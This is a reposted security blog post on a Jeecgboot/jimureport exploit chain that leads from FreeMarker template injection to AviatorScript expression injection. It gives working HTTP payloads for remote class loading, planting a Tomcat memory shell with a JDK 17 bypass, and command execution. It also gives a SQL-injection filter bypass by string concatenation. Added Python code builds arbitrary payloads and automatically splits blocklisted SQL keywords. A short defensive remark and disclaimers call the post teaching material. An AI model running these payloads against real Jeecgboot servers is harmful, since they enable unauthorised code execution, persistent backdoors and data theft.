Article summary: The post analyses the fix for the SSTI vulnerability in the Jeecgboot framework and a new exploitation chain. The author found that, although the FreeMarker template injection itself has been fixed, the compute() method of the jeecg object exposed to the template can trigger AviatorScript expression injection, leading to command execution or a memory-shell implant. It gives concrete payload construction, a bypass for newer JDK versions, and a demonstration of using FreeMarker string concatenation to get past the SQL interception. Overall score: 85 Categories: vulnerability analysis, web security, secure development, hands-on experience, red team
Jeecgboot SSTI: old bug, new trick
Original
XG小刚
June 24, 2026, 14:04, Beijing
This experiment is for information-defence teaching only and must not be used for any other purpose.
Official account: XG小刚
While testing a project some time ago I came across the Jeecgboot framework and wanted to try the two historical template-injection vulnerabilities. The queryFieldBySql and loadTableData endpoints turned out to be reachable without authentication, but the FreeMarker template injection in both had already been fixed.
Jeecgboot's fix is simple: starting with jimureport 1.6.1 it uses FreeMarker's own setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER), which stops the new() built-in from instantiating the three dangerous classes (ObjectConstructor, Execute and JythonRuntime).
I tried a sandbox escape, but the FreeMarker version is above 2.3.30, so the protectionDomain route out of the sandbox is no longer available.
springMacroRequestContext is not enabled either, so there is no way to reach the configuration and switch the FreeMarker sandbox off. That part really is fixed.
I then tried the AviatorScript expression injection in the save endpoint, and that did not work either...
New finding
To keep trying a FreeMarker sandbox escape you need a usable object in the data model, something you can call methods on or obtain a Class from.
Looking at how the FreeMarker template is executed, two instances are passed into it: jeecg and isNotEmpty.
Following into the FreemarkerMethod class, it has a compute() method, and that method evaluates AviatorScript expressions.
So if FreeMarker is used to call compute() on jeecg with the right arguments, that gives a chain from FreeMarker template injection to AviatorScript expression injection. SAFER_RESOLVER only restricts new(); it says nothing about calling methods on objects the application itself puts into the model.
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 113
{"dbSource":"","sql":"select \"${jeecg.compute(null,{'a':'a'},'7*7')}\"","tableName":"","pageNo":1,"pageSize":10}
Then it is just a matter of using the Aviator expression for command execution or a memory shell.
FreeMarker -> Aviator exploitation
Generate the expression with java-chains.
Command execution
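As an added example, not code from the original post or from the Jeecgboot project: a small Python probe that builds the loadTableData body from an arbitrary AviatorScript expression (the page's payloads are hand-written instances of this, with the JSON and FreeMarker quoting done by hand) and checks whether the expression was actually evaluated. It uses a random a*b canary rather than 7*7 so the product cannot collide with a number that is already in the response. The endpoint path, JSON field names and the (null, map, expression) argument shape of jeecg.compute() are taken from the requests above; the response shape used for checking is an assumption, since the page does not show what the endpoint returns.

```python
import json
import re
import secrets
import urllib.error
import urllib.request

# Path and JSON field names are taken from the requests shown above.
LOAD_TABLE_DATA = "/jeecg-boot/jmreport/loadTableData"


def freemarker_string(s):
    """Quote s as a FreeMarker double-quoted string literal (backslash escapes,
    as in Java) so the Aviator expression inside may use single quotes freely."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def compute_call(expr):
    """FreeMarker interpolation that hands expr to jeecg.compute(); the argument
    shape (null, a one-entry map, the expression) mirrors the page's payloads."""
    return "${jeecg.compute(null,{'a':'a'}," + freemarker_string(expr) + ")}"


def build_body(expr):
    """JSON body for loadTableData; json.dumps produces the \\" escaping that the
    hand-written requests above show."""
    sql = 'select "' + compute_call(expr) + '"'
    body = {"dbSource": "", "sql": sql, "tableName": "", "pageNo": 1, "pageSize": 10}
    return json.dumps(body, separators=(",", ":"))


def arithmetic_canary():
    """Random a*b probe: a fixed 7*7 can collide with a 49 already present in
    the response, a random product of two four-digit numbers practically cannot."""
    a = secrets.randbelow(9000) + 1000
    b = secrets.randbelow(9000) + 1000
    return "%d*%d" % (a, b), str(a * b)


def expression_evaluated(response_text, expected):
    """True when the product shows up as a stand-alone number, i.e. the template
    was rendered and compute() ran the expression. An unrendered or rejected
    template echoes '1234*5678' at most, never the product."""
    return re.search(r"(?<!\d)" + re.escape(expected) + r"(?!\d)", response_text) is not None


def probe(base_url, token=None, timeout=10):
    """Send one canary to a host you are authorised to test; returns (status, evaluated)."""
    expr, expected = arithmetic_canary()
    req = urllib.request.Request(base_url.rstrip("/") + LOAD_TABLE_DATA,
                                 data=build_body(expr).encode(),
                                 headers={"Content-Type": "application/json;charset=UTF-8"},
                                 method="POST")
    if token:  # 3.8.0 and later no longer accept the unauthenticated path
        req.add_header("X-Access-Token", token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, text = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # an error page can still carry the rendered value
        status, text = e.code, e.read().decode("utf-8", "replace")
    return status, expression_evaluated(text, expected)


if __name__ == "__main__":
    import sys
    status, hit = probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
    print("HTTP %d, expression evaluated: %s" % (status, hit))
```

Run it as python probe.py http://127.0.0.1:18080 [token]. A hit means any Aviator expression runs through compute(), including the defineClass and CommandExecUtil payloads shown below; the builder does the quoting for those too, since they only differ in the expression string.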
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 1386
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('Test',Base64Utils.decodeFromString('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'),ClassLoader.getSystemClassLoader());\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
Planting a Tomcat Filter memory shell
In real environments the reflective defineClass used above runs into the stricter encapsulation of newer JDKs, for example JDK 17.
Whoopsunix's method for Aviator expression injection on newer JDKs can be used instead: the five-argument ReflectUtils.defineClass() overload takes a contextClass, so the class is defined through a MethodHandles.Lookup in that class's package (hence the org.springframework.expression.Testaa name below) rather than through reflection.
https://whoopsunix.com/docs/java/Expression/Aviator/
POST /jeecg-boot/jmreport/loadTableData?previousPage=1&shareToken=123&token=1 HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 1586
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.apache.commons.codec.binary.Base64;use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Testaa',Base64.decodeBase64('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'),ClassLoader.getSystemClassLoader(),nil,Class.forName('org.springframework.expression.ExpressionParser'));\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
From Jeecgboot 3.8.0 there is also a new static method CommandExecUtil.execCommand(), which Aviator can call directly for command execution without needing the defineClass bypass on JDK 17.
The newer version does, however, close the authorization bypass, so this only works with a valid token.
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
Content-Type: application/json;charset=UTF-8
Content-Length: 285
{"dbSource":"","sql":"callll{${jeecg.compute(null,{'1':'1'},\"use org.apache.commons.lang3.StringUtils;use org.jeecg.modules.airag.llm.handler.CommandExecUtil;CommandExecUtil.execCommand('open -a calculator',StringUtils.split('',''));\")};#{1}","tableName":"","pageNo":1,"pageSize":10}
FreeMarker -> SQL exploitation
As for the SQL injection check, FreeMarker string concatenation walks straight past it: the keyword check sees the unrendered template, so splitting keywords across string literals hides them. I will not go into more detail.
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1:18080
X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3ODIyMzIzODIsInVzZXJuYW1lIjoiYWRtaW4ifQ.NAD7IHucl0qpPHafOZzrZcnhaiS49TVHRL6h8zAs-zU
Content-Type: application/json;charset=UTF-8
Content-Length: 215
{"dbSource":"","sql":"${\"se\"+\"lect upd\"+\"atexml(1,concat('~',(select table_name from informati\"+\"on_schema.tables where table_schema=database() limit 0,1),'~'),1)\"}" ,"tableName":"","pageNo":1,"pageSize":10}
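Added example, not from the post or from the project: a Python model of the concatenation trick above. split_keywords() generalises the hand-split payload, cutting every blocklisted keyword in the middle so that none appears contiguously in the template source, while render_concat() reproduces what FreeMarker hands to the SQL layer. The blocklist is a constructed stand-in, because the page does not show the real check; check_rendered() is the form of the check that the trick does not get past.

```python
import re

# Constructed stand-in for the keyword check the page says loadTableData applies to
# the sql field; the real list is not shown on the page, so this one is an assumption.
BLOCKLIST = ("updatexml", "extractvalue", "information_schema", "sleep", "benchmark")

# One FreeMarker double-quoted string literal, with backslash escapes.
_FM_STRING = re.compile(r'"((?:\\.|[^"\\])*)"')


def keyword_blocked(text, blocklist=BLOCKLIST):
    """First blocked keyword found in text (case-insensitive), or None."""
    low = text.lower()
    for kw in blocklist:
        if kw in low:
            return kw
    return None


def freemarker_string(s):
    """Quote s as a FreeMarker double-quoted string literal."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def split_keywords(sql, blocklist=BLOCKLIST):
    """Rewrite sql as ${"..."+"..."}: every blocked keyword is cut in the middle so
    it never appears contiguously in the template source, yet FreeMarker puts it
    back together at render time. This is the general form of the payload above."""
    pattern = re.compile("|".join(re.escape(k) for k in blocklist), re.I)
    cuts = sorted({m.start() + (m.end() - m.start()) // 2 for m in pattern.finditer(sql)})
    fragments, prev = [], 0
    for c in cuts:
        fragments.append(sql[prev:c])
        prev = c
    fragments.append(sql[prev:])
    template = "${" + "+".join(freemarker_string(f) for f in fragments) + "}"
    if keyword_blocked(template, blocklist):  # defensive: should not happen for this list
        raise ValueError("could not hide every keyword")
    return template


def render_concat(template):
    """What FreeMarker hands to the SQL layer for a ${"a"+"b"} template: the string
    literals joined, backslash escapes removed. Only this one construct is
    modelled; it is not a FreeMarker parser."""
    m = re.fullmatch(r"\$\{(.*)\}", template, re.S)
    if m is None:
        raise ValueError("not a single ${...} interpolation")
    return "".join(re.sub(r"\\(.)", r"\1", lit) for lit in _FM_STRING.findall(m.group(1)))


def check_rendered(template, blocklist=BLOCKLIST):
    """The check that actually holds: run the keyword filter on the rendered text."""
    return keyword_blocked(render_concat(template), blocklist)
```

The lesson for the defender is that a keyword filter on the sql field sees template source, not SQL: it has to run on the rendered string, and better still the field should not be rendered as a FreeMarker template at all.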
Job search
I am also looking for a job in penetration testing / red teaming, based in Beijing.
If you have a suitable position, feel free to message me.
Disclaimer:
The programs and techniques in this article are intended solely for lawful security research and teaching, to improve defensive capability, and are of a clearly technical research nature.
Any organisation or individual that uses the contents of this article without authorisation for attacks, sabotage or other illegal purposes bears sole responsibility for all resulting legal liability, civil damages and joint liability; this site assumes no joint liability.
Content on this site is published for technical exchange and knowledge sharing; if there is a copyright issue or other objection, please get in touch by email using the contact details at the top of the page.
Reposted from: XG小刚, "Jeecgboot SSTI老洞新招" (Jeecgboot SSTI: old bug, new trick)
Copyright notice
This site keeps a backup copy for research and teaching reference only.
Readers who use the information for other purposes bear all legal and joint liability themselves; this site accepts no responsibility.